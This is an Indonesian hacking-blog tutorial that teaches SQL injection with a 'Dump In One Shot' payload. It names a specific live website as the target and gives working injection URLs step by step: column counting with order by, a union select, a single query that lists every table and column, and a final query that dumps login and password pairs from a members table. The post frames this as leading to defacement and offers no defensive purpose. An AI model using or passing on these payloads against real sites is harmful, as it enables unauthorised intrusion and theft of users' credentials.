Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.

Tutorial SQLI dengan DIOS ( Dump In One Shot )

Rio Setyawan 5:23 AM
Oke gan kalau kemarin saya sudah membahas Tutorial deface dengan SQLI manual, Kali ini saya akan membagikan Tutorial SQLI dengan DIOS ( Dump In One Shot )

Kalau Di artikel kemarin kita habis union select kita mesti masukan group_concat dan seterusnya untuk mengetahui column, table, kali ini gak perlu repot-repot lagi, nanti bakal keluar semua column beserta table nya,
Yang Belum membaca tutorial kemarin baca dulu disini

Oke langsung saja
Seperti biasa anggap saja saya sudah mendapatkan target
http://www.yorkritetexas.org/commandery/info-Commandery-list.php?ID=47
Terus lanjut kita masukan kode Order by,
Tutorial SQLI dengan DIOS ( Dump In One Shot )
order by 1--+
order by 2--+
order by 3--+
Dan seterusnya. dan skip
saya udah menemukan error di order by 41--+ , berati jumlah column ada 40
Tutorial SQLI dengan DIOS ( Dump In One Shot )
Disini target saya error nya gak tampilan error mysql blablabla tapi blank data ada yg hilang di bagian sidebar.
Oke lanjut anggap saja udah mengerti di artikel kemarin hehe.
Lanjut masukan union Select

http://www.yorkritetexas.org/commandery/info-Commandery-list.php?ID=-47+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+
Tutorial SQLI dengan DIOS ( Dump In One Shot )

Dan lihat gambar di atas, di bagian sudah muncul angka nya, nah kalau di tutorial kemarin kita mesti harus memasukan group_concat dan lain-lain kali ini langsung masukan kode dios aja, Masukan kode di bawah ini di salah 1 angka yang muncul disitu,
 (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) 


Disini saya memasukanya di angka 10, maka kodenya seperti berikut
http://www.yorkritetexas.org/commandery/info-Commandery-list.php ?ID=-47+union+select+1,2,3,4,5,6,7,8,9,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

Tutorial SQLI dengan DIOS ( Dump In One Shot )

Nah Lihat gambar diatas semua column beserta table nya sudah muncul, Yang kiri itu column lalu yang kanan itu table nya,
Tinggal dump deh. Kan sudah tau column dan table nya,
http://www.yorkritetexas.org/commandery/info-Commandery-list.php ?ID=-47+union+select+1,2,3,4,5,6,7,8,9,group_concat(login,0x3a,passwd),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+members--+
Tutorial SQLI dengan DIOS ( Dump In One Shot )


Nah Sudah muncul tuh datanya., Mudah kan, oke sekian dulu semoga bermanfaat


Tag: DIOS,  Dump In One Shot, tutorial Dump In One Shot, tutorial dios, tutorial sqli manual, Idiot Attacker
Previous
Next Post »
0 Komentar